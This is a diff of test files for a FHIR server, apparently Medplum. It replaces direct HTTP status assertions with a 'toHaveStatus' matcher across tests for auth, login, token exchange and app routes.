-      expect(res1.status).toStrictEqual(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.headers['content-location']).not.toBeDefined();
       expect(res1.body).toMatchObject(badRequest('Operation requires "Prefer: respond-async"'));
     });
@@ -1397,7 +1397,7 @@ describe('Super Admin routes', () => {
         .type('json')
         .send({ resourceType: 'Bot', cronString: '*/20 * * * *' } satisfies Bot);
 
-      expect(res1.status).toStrictEqual(201);
+      expect(res1).toHaveStatus(201);
       expect(res1.body).toBeDefined();
 
       const bot = res1.body as Bot & { id: string };
@@ -1411,7 +1411,7 @@ describe('Super Admin routes', () => {
         .set('Prefer', 'respond-async')
         .type('json');
 
-      expect(res2.status).toStrictEqual(202);
+      expect(res2).toHaveStatus(202);
       expect(res2.headers['content-location']).toBeDefined();
       await waitForAsyncJob(res2.headers['content-location'], app, adminAccessToken);
 

--- a/packages/server/src/app.test.ts
+++ b/packages/server/src/app.test.ts
@@ -32,7 +32,7 @@ describe('App', () => {
     const config = await loadTestConfig();
     await initApp(app, config);
     const res = await request(app).get('/');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['cache-control']).toBeDefined();
     expect(res.headers['content-security-policy']).toBeDefined();
     expect(res.headers['referrer-policy']).toBeDefined();
@@ -44,7 +44,7 @@ describe('App', () => {
     const config = await loadTestConfig();
     await initApp(app, config);
     const res = await request(app).get('/api/');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['cache-control']).toBeDefined();
     expect(res.headers['content-security-policy']).toBeDefined();
     expect(res.headers['referrer-policy']).toBeDefined();
@@ -90,7 +90,7 @@ describe('App', () => {
     getConfig().baseUrl = 'https://example.com/';
     await initApp(app, config);
     const res = await request(app).get('/');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['cache-control']).toBeDefined();
     expect(res.headers['content-security-policy']).toBeDefined();
     expect(res.headers['strict-transport-security']).toBeDefined();
@@ -102,7 +102,7 @@ describe('App', () => {
     const config = await loadTestConfig();
     await initApp(app, config);
     const res = await request(app).get('/robots.txt');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.text).toBe('User-agent: *\nDisallow: /');
     expect(await shutdownApp()).toBeUndefined();
   });
@@ -112,7 +112,7 @@ describe('App', () => {
     const config = await loadTestConfig();
     await initApp(app, config);
     const res = await request(app).get('/').set('Origin', 'https://blackhat.xyz');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['origin']).toBeUndefined();
     expect(await shutdownApp()).toBeUndefined();
   });
@@ -134,7 +134,7 @@ describe('App', () => {
 
     test('X-Forwarded-For spoofing', async () => {
       const res = await request(app).get('/').set('X-Forwarded-For', '1.1.1.1, 2.2.2.2');
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
 
       const logLines = stdOutSpy.mock.calls.filter((call) => call[0].includes('Request served'));
       expect(logLines).toHaveLength(1);
@@ -154,7 +154,7 @@ describe('App', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send(patient);
-      expect(res1.status).toBe(201);
+      expect(res1).toHaveStatus(201);
       expect(res1.body).toMatchObject(patient);
 
       const logLines = stdOutSpy.mock.calls.filter((call) => call[0].includes('Request served'));
@@ -189,7 +189,7 @@ describe('App', () => {
         .set('X-Medplum-On-Behalf-Of', getReferenceString(profile))
         .set('Content-Type', ContentType.FHIR_JSON)
         .send(patient);
-      expect(res1.status).toBe(201);
+      expect(res1).toHaveStatus(201);
       expect(res1.body).toMatchObject(patient);
       expect(process.stdout.write).toHaveBeenCalledTimes(1);
 
@@ -205,7 +205,7 @@ describe('App', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send(`>kjaysgdfsk;sdfgjsdrg<`); // Send malformed data that will fail in the body parser middleware
-      expect(res1.status).toBe(400);
+      expect(res1).toHaveStatus(400);
 
       const logLines = stdOutSpy.mock.calls.filter((call) => call[0].includes('Request served'));
       expect(logLines).toHaveLength(1);
@@ -224,7 +224,7 @@ describe('App', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send();
-      expect(res1.status).toBe(400);
+      expect(res1).toHaveStatus(400);
       const outcome = res1.body as OperationOutcome;
       const issue = outcome.issue[0];
 
@@ -246,7 +246,7 @@ describe('App', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send();
-      expect(res1.status).toBe(400);
+      expect(res1).toHaveStatus(400);
     });
   });
 
@@ -258,7 +258,7 @@ describe('App', () => {
     const config = await loadTestConfig();
     await initApp(app, config);
     const res = await request(app).get('/throw');
-    expect(res.status).toBe(500);
+    expect(res).toHaveStatus(500);
     expect(res.body).toMatchObject({ msg: 'Internal Server Error' });
     expect(await shutdownApp()).toBeUndefined();
   });
@@ -273,7 +273,7 @@ describe('App', () => {
     const config = await loadTestConfig();
     await initApp(app, config);
     const res = await request(app).get('/throw');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject(badRequest('Stream not readable'));
     expect(await shutdownApp()).toBeUndefined();
   });
@@ -301,7 +301,7 @@ describe('App', () => {
     const res = await request(app)
       .get(`/fhir/R4/SearchParameter?base=Observation`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toStrictEqual(400);
+    expect(res).toHaveStatus(400);
 
     expect(await shutdownApp()).toBeUndefined();
   });
@@ -314,7 +314,7 @@ describe('App', () => {
       .options('/fhir/R4/Patient')
       .set('Origin', 'http://localhost:3000')
       .set('Access-Control-Request-Method', 'GET');
-    expect(res.status).toBe(204);
+    expect(res).toHaveStatus(204);
     expect(res.header['access-control-max-age']).toBe('600');
     expect(res.header['cache-control']).toBe('no-store, no-cache, must-revalidate');
     expect(await shutdownApp()).toBeUndefined();
@@ -331,9 +331,9 @@ describe('App', () => {
     await initApp(app, config);
 
     const res = await request(app).get('/api/');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const res2 = await request(app).get('/api/');
-    expect(res2.status).toBe(429);
+    expect(res2).toHaveStatus(429);
     await deleteRedisKeys(getRateLimitRedis(), rateLimitRedisConfig.keyPrefix);
     expect(await shutdownApp()).toBeUndefined();
   });
@@ -346,9 +346,9 @@ describe('App', () => {
     await initApp(app, config);
 
     const res = await request(app).get('/api/');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const res2 = await request(app).get('/api/');
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(await shutdownApp()).toBeUndefined();
   });
 
@@ -362,7 +362,7 @@ describe('App', () => {
     const config = await loadTestConfig();
     await initApp(app, config);
     const res = await request(app).get('/throw');
-    expect(res.status).toBe(415);
+    expect(res).toHaveStatus(415);
     expect(res.body).toMatchObject(unsupportedMediaType);
     expect(await shutdownApp()).toBeUndefined();
   });

--- a/packages/server/src/auth/changepassword.test.ts
+++ b/packages/server/src/auth/changepassword.test.ts
@@ -52,7 +52,7 @@ describe('Change Password', () => {
         newPassword: 'password!@#123',
       });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 
   test('Missing old password', async () => {
@@ -74,7 +74,7 @@ describe('Change Password', () => {
         newPassword: 'password!@#123',
       });
 
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
   });
 
   test('Old password not set', async () => {
@@ -89,7 +89,7 @@ describe('Change Password', () => {
         newPassword: 'password!@#123',
       });
 
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body).toMatchObject(badRequest('Existing password not set', 'oldPassword'));
   });
 
@@ -112,7 +112,7 @@ describe('Change Password', () => {
         newPassword: 'password!@#123',
       });
 
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body).toMatchObject(badRequest('Incorrect password', 'oldPassword'));
   });
 
@@ -138,7 +138,7 @@ describe('Change Password', () => {
         newPassword: 'breached',
       });
 
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body).toMatchObject(badRequest('Password found in breach database'));
   });
 });

--- a/packages/server/src/auth/clientinfo.test.ts
+++ b/packages/server/src/auth/clientinfo.test.ts
@@ -23,13 +23,13 @@ describe('OAuth utils', () => {
 
   test('Success with SignInForm', async () => {
     const res = await request(app).get(`/auth/clientinfo/${client.id}`).type('json');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.welcomeString).toBe(client.signInForm?.welcomeString);
     expect(res.body.logo.url).toBe(client.signInForm?.logo?.url);
   });
 
   test('Invalid client', async () => {
     const res = await request(app).get(`/auth/clientinfo/INVALIDID`).type('json');
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 });

--- a/packages/server/src/auth/exchange.test.ts
+++ b/packages/server/src/auth/exchange.test.ts
@@ -134,7 +134,7 @@ describe('Token Exchange', () => {
       externalAccessToken: '',
       clientId: defaultClient.id,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Missing externalAccessToken');
   });
 
@@ -143,7 +143,7 @@ describe('Token Exchange', () => {
       externalAccessToken: 'xyz',
       clientId: '',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Missing clientId');
   });
 
@@ -152,7 +152,7 @@ describe('Token Exchange', () => {
       externalAccessToken: 'xyz',
       clientId: defaultClient.id,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error_description).toBe('Invalid client');
   });
 
@@ -163,7 +163,7 @@ describe('Token Exchange', () => {
       externalAccessToken: 'xyz',
       clientId: externalAuthClient.id,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('User not found');
   });
 
@@ -174,7 +174,7 @@ describe('Token Exchange', () => {
       externalAccessToken: 'xyz',
       clientId: externalAuthClient.id,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
   });
 
@@ -189,7 +189,7 @@ describe('Token Exchange', () => {
       externalAccessToken: 'xyz',
       clientId: externalAuthConfigClientId,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
   });
 
@@ -200,7 +200,7 @@ describe('Token Exchange', () => {
       externalAccessToken: 'firebase-token',
       clientId: gcipAuthClient.id,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
     expect(fetchMock).toHaveBeenCalledWith(
       'https://identitytoolkit.googleapis.com/v1/accounts:lookup?key=test-api-key',
@@ -226,7 +226,7 @@ describe('Token Exchange', () => {
       projectId: '',
       clientId: externalAuthClient.id,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Invalid token request', async () => {
@@ -236,7 +236,7 @@ describe('Token Exchange', () => {
       externalAccessToken: 'xyz',
       clientId: externalAuthClient.id,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Failed to verify code - unsupported content type: text/plain');
   });
@@ -248,7 +248,7 @@ describe('Token Exchange', () => {
       externalAccessToken: 'xyz',
       clientId: subjectAuthClient.id,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
   });
 
@@ -259,7 +259,7 @@ describe('Token Exchange', () => {
       externalAccessToken: 'firebase-token',
       clientId: gcipSubjectAuthClient.id,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.access_token).toBeTruthy();
   });
 
@@ -270,7 +270,7 @@ describe('Token Exchange', () => {
       externalAccessToken: 'firebase-token',
       clientId: gcipAuthClient.id,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error_description).toBe('Failed to verify code - missing localId in user info response');
   });
 });

--- a/packages/server/src/auth/external.test.ts
+++ b/packages/server/src/auth/external.test.ts
@@ -105,19 +105,19 @@ describe('External', () => {
 
   test('Missing code', async () => {
     const res = await request(app).get('/auth/external?code=&state=xyz');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Missing code');
   });
 
   test('Missing state', async () => {
     const res = await request(app).get('/auth/external?code=xyz&state=');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Missing state');
   });
 
   test('Invalid JSON state', async () => {
     const res = await request(app).get('/auth/external?code=xyz&state=xyz');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Invalid state');
   });
 
@@ -129,7 +129,7 @@ describe('External', () => {
     });
 
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Identity provider not found');
   });
 
@@ -141,7 +141,7 @@ describe('External', () => {
     });
 
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Identity provider not found');
   });
 
@@ -157,7 +157,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('User not found');
   });
 
@@ -173,7 +173,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('External token does not contain email address');
   });
 
@@ -189,7 +189,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Email address does not match domain');
   });
 
@@ -208,7 +208,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const redirect = new URL(res.header.location);
     expect(redirect.host).toStrictEqual('localhost:3000');
@@ -233,7 +233,7 @@ describe('External', () => {
 
       // Simulate the external identity provider callback
       const res = await request(app).get(url);
-      expect(res.status).toBe(302);
+      expect(res).toHaveStatus(302);
 
       const redirect = new URL(res.header.location);
       expect(redirect.host).toStrictEqual('localhost:3000');
@@ -255,7 +255,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const redirect = new URL(res.header.location);
     expect(redirect.host).toStrictEqual(domain);
@@ -274,7 +274,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const redirect = new URL(res.header.location);
     expect(redirect.host).toStrictEqual(domain);
@@ -293,7 +293,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Identity provider not found');
   });
 
@@ -308,7 +308,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Invalid project');
   });
 
@@ -323,7 +323,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Invalid redirect URI');
   });
 
@@ -338,7 +338,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Failed to verify code - check your identity provider configuration');
   });
 
@@ -431,7 +431,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const redirect = new URL(res.header.location);
     expect(redirect.host).toStrictEqual(domain);
@@ -483,7 +483,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Invalid redirect URI');
   });
 
@@ -523,7 +523,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Invalid redirect URI');
   });
 
@@ -563,7 +563,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('External token does not contain subject');
   });
 
@@ -604,7 +604,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const redirect = new URL(res.header.location);
     expect(redirect.host).toStrictEqual(domain);
@@ -654,7 +654,7 @@ describe('External', () => {
     fetchMock.mockImplementation(() => mockFetchJson(buildTokens(testEmail)));
 
     const res = await request(app).get(url);
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const redirect = new URL(res.header.location);
     expect(redirect.hostname).toStrictEqual('myapp.example.com');
@@ -673,7 +673,7 @@ describe('External', () => {
     fetchMock.mockImplementation(() => mockFetchJson(buildTokens(email)));
 
     const res = await request(app).get(url);
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const redirect = new URL(res.header.location);
     expect(redirect.host).toStrictEqual('localhost:3000');
@@ -718,7 +718,7 @@ describe('External', () => {
     fetchMock.mockImplementation(() => mockFetchJson(buildTokens(testEmail)));
 
     const res = await request(app).get(url);
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     // Should fall back to default signin, NOT redirect to evil.com
     const redirect = new URL(res.header.location);
@@ -787,7 +787,7 @@ describe('External', () => {
 
     // Simulate the external identity provider callback
     const res = await request(app).get(url);
-    expect(res.status).toBe(302);
+    expect(res).toHaveStatus(302);
 
     const redirect = new URL(res.header.location);
     expect(redirect.host).toStrictEqual(domain);

--- a/packages/server/src/auth/google.test.ts
+++ b/packages/server/src/auth/google.test.ts
@@ -60,7 +60,7 @@ describe('Google Auth', () => {
         googleClientId: '',
         googleCredential: createCredential('Admin', 'Admin', 'admin@example.com'),
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Missing googleClientId');
   });
@@ -73,7 +73,7 @@ describe('Google Auth', () => {
         googleClientId: '123',
         googleCredential: createCredential('Admin', 'Admin', 'admin@example.com'),
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Invalid googleClientId');
   });
@@ -83,7 +83,7 @@ describe('Google Auth', () => {
       googleClientId: getConfig().googleClientId,
       googleCredential: '',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Missing googleCredential');
   });
@@ -93,7 +93,7 @@ describe('Google Auth', () => {
       googleClientId: getConfig().googleClientId,
       googleCredential: 'invalid',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Verification failed');
   });
@@ -106,7 +106,7 @@ describe('Google Auth', () => {
         googleClientId: getConfig().googleClientId,
         googleCredential: createCredential('Admin', 'Admin', 'admin@example.com'),
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.code).toBeDefined();
   });
 
@@ -119,7 +119,7 @@ describe('Google Auth', () => {
         googleClientId: getConfig().googleClientId,
         googleCredential: createCredential('Test', 'Test', email),
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
 
     const user = await getUserByEmail(email, undefined);
     expect(user).toBeUndefined();
@@ -137,7 +137,7 @@ describe('Google Auth', () => {
         createUser: true,
         projectId: 'new',
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Registration is disabled');
 
     const user = await getUserByEmail(email, undefined);
@@ -154,7 +154,7 @@ describe('Google Auth', () => {
         googleCredential: createCredential('Test', 'Test', email),
         createUser: true,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.login).toBeDefined();
     expect(res.body.code).toBeUndefined();
 
@@ -173,7 +173,7 @@ describe('Google Auth', () => {
         googleCredential: createCredential('Test', 'Test', email),
         createUser: true,
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.login).toBeDefined();
     expect(res.body.code).toBeUndefined();
 
@@ -198,7 +198,7 @@ describe('Google Auth', () => {
         googleClientId: getConfig().googleClientId,
         googleCredential: createCredential('Test', 'Test', email),
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.login).toBeDefined();
     expect(res.body.code).toBeUndefined();
 
@@ -236,7 +236,7 @@ describe('Google Auth', () => {
         googleClientId: getConfig().googleClientId,
         googleCredential: createCredential('Test', 'Test', email),
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.code).toBeDefined();
   });
 
@@ -274,7 +274,7 @@ describe('Google Auth', () => {
         googleClientId: getConfig().googleClientId,
         googleCredential: createCredential('Test', 'Test', email, 'https://example.com/picture.jpg'),
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.code).toBeDefined();
 
     // Now re-fetch the profile
@@ -320,7 +320,7 @@ describe('Google Auth', () => {
         googleClientId: googleClientId,
         googleCredential: createCredential('Test', 'Test', email),
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.code).toBeDefined();
   });
 
@@ -363,7 +363,7 @@ describe('Google Auth', () => {
         googleClientId: googleClientId,
         googleCredential: createCredential('Test', 'Test', email),
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.code).toBeUndefined();
     expect(res2.body.login).toBeDefined();
     expect(res2.body.memberships).toBeDefined();
@@ -409,7 +409,7 @@ describe('Google Auth', () => {
         googleClientId: googleClientId,
         googleCredential: createCredential('Test', 'Test', email),
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 
   test('Custom Google client wrong projectId', async () => {
@@ -450,7 +450,7 @@ describe('Google Auth', () => {
         googleClientId: googleClientId,
         googleCredential: createCredential('Test', 'Test', email),
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0].details.text).toStrictEqual('Invalid googleClientId');
   });
 
@@ -477,7 +477,7 @@ describe('Google Auth', () => {
         googleClientId: getConfig().googleClientId,
         googleCredential: createCredential('Text', 'User', email),
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.code).toBeDefined();
   });
 
@@ -504,7 +504,7 @@ describe('Google Auth', () => {
         googleClientId: getConfig().googleClientId,
         googleCredential: createCredential('Text', 'User', email),
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toStrictEqual('Invalid projectId');
   });
 });

--- a/packages/server/src/auth/login.test.ts
+++ b/packages/server/src/auth/login.test.ts
@@ -96,7 +96,7 @@ describe('Login', () => {
       password,
       scope: 'openid',
     });
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Invalid client ID', async () => {
@@ -106,7 +106,7 @@ describe('Login', () => {
       password,
       scope: 'openid',
     });
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Not found');
   });
@@ -117,7 +117,7 @@ describe('Login', () => {
       password,
       scope: 'openid',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Valid email address is required');
   });
@@ -128,7 +128,7 @@ describe('Login', () => {
       password,
       scope: 'openid',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Valid email address is required');
   });
@@ -139,7 +139,7 @@ describe('Login', () => {
       password: '',
       scope: 'openid',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Invalid password, must be at least 8 characters');
   });
@@ -150,7 +150,7 @@ describe('Login', () => {
       password: 'wrong-password',
       scope: 'openid',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue).toBeDefined();
     expect(res.body.issue[0].details.text).toBe('Email or password is invalid');
   });
@@ -163,7 +163,7 @@ describe('Login', () => {
       password: 'medplum_admin',
       scope: 'openid',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.issue[0].details.text).toBe('Invalid projectId');
   });
 
@@ -174,7 +174,7 @@ describe('Login', () => {
       password,
       scope: 'openid',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.code).toBeDefined();
   });
 
@@ -184,7 +184,7 @@ describe('Login', () => {
       password,
       scope: 'openid',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.code).toBeDefined();
   });
 
@@ -195,7 +195,7 @@ describe('Login', () => {
       scope: 'openid',
       projectId: 'new',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.login).toBeDefined();
     expect(res.body.code).not.toBeDefined();
   });
@@ -232,7 +232,7 @@ describe('Login', () => {
         ],
       });
 
-    expect(resX.status).toBe(201);
+    expect(resX).toHaveStatus(201);
 
     // Invite a new member
     const res2 = await request(app)
@@ -245,7 +245,7 @@ describe('Login', () => {
         email: memberEmail,
       });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(mockSESv2Client.send.callCount).toBe(1);
     expect(mockSESv2Client.commandCalls(SendEmailCommand)).toHaveLength(1);
 
@@ -262,7 +262,7 @@ describe('Login', () => {
     const res4 = await request(app)
       .get('/admin/projects/' + project.id + '/members/' + res2.body.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
 
     // Set the new member's access policy
     const res5 = await request(app)
@@ -273,7 +273,7 @@ describe('Login', () => {
         ...res4.body,
         accessPolicy: createReference(resX.body),
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     // Get the project details
     // Make sure the access policy is set
@@ -281,7 +281,7 @@ describe('Login', () => {
     const res6 = await request(app)
       .get('/admin/projects/' + project.id + '/members/' + res2.body.id)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body.accessPolicy).toBeDefined();
 
     // Now try to login as the new member
@@ -291,7 +291,7 @@ describe('Login', () => {
       secret,
       password: 'my-new-password',
     });
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
 
     // Then login
     const res8 = await request(app).post('/auth/login').type('json').send({
@@ -301,7 +301,7 @@ describe('Login', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res8.status).toBe(200);
+    expect(res8).toHaveStatus(200);
     expect(res8.body.code).toBeDefined();
 
     // Then get access token
@@ -310,7 +310,7 @@ describe('Login', () => {
       code: res8.body.code,
       code_verifier: 'xyz',
     });
-    expect(res9.status).toBe(200);
+    expect(res9).toHaveStatus(200);
     expect(res9.body.token_type).toBe('Bearer');
     expect(res9.body.scope).toBe('openid offline_access');
     expect(res9.body.expires_in).toBe(3600);
@@ -333,7 +333,7 @@ describe('Login', () => {
           },
         ],
       });
-    expect(res10.status).toBe(201);
+    expect(res10).toHaveStatus(201);
 
     // Should not be able to create an observation
     const res11 = await request(app)
@@ -353,7 +353,7 @@ describe('Login', () => {
         },
         subject: createReference(res10.body),
       });
-    expect(res11.status).toBe(403);
+    expect(res11).toHaveStatus(403);
   });
 
   test('Require Google auth', async () => {
@@ -385,7 +385,7 @@ describe('Login', () => {
       password,
       scope: 'openid offline_access',
     });
-    expect(res8.status).toBe(400);
+    expect(res8).toHaveStatus(400);
     expect(res8.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [
@@ -430,7 +430,7 @@ describe('Login', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body.code).toBeUndefined();
     expect(res1.body.memberships).toHaveLength(2);
 
@@ -444,7 +444,7 @@ describe('Login', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.code).toBeDefined();
 
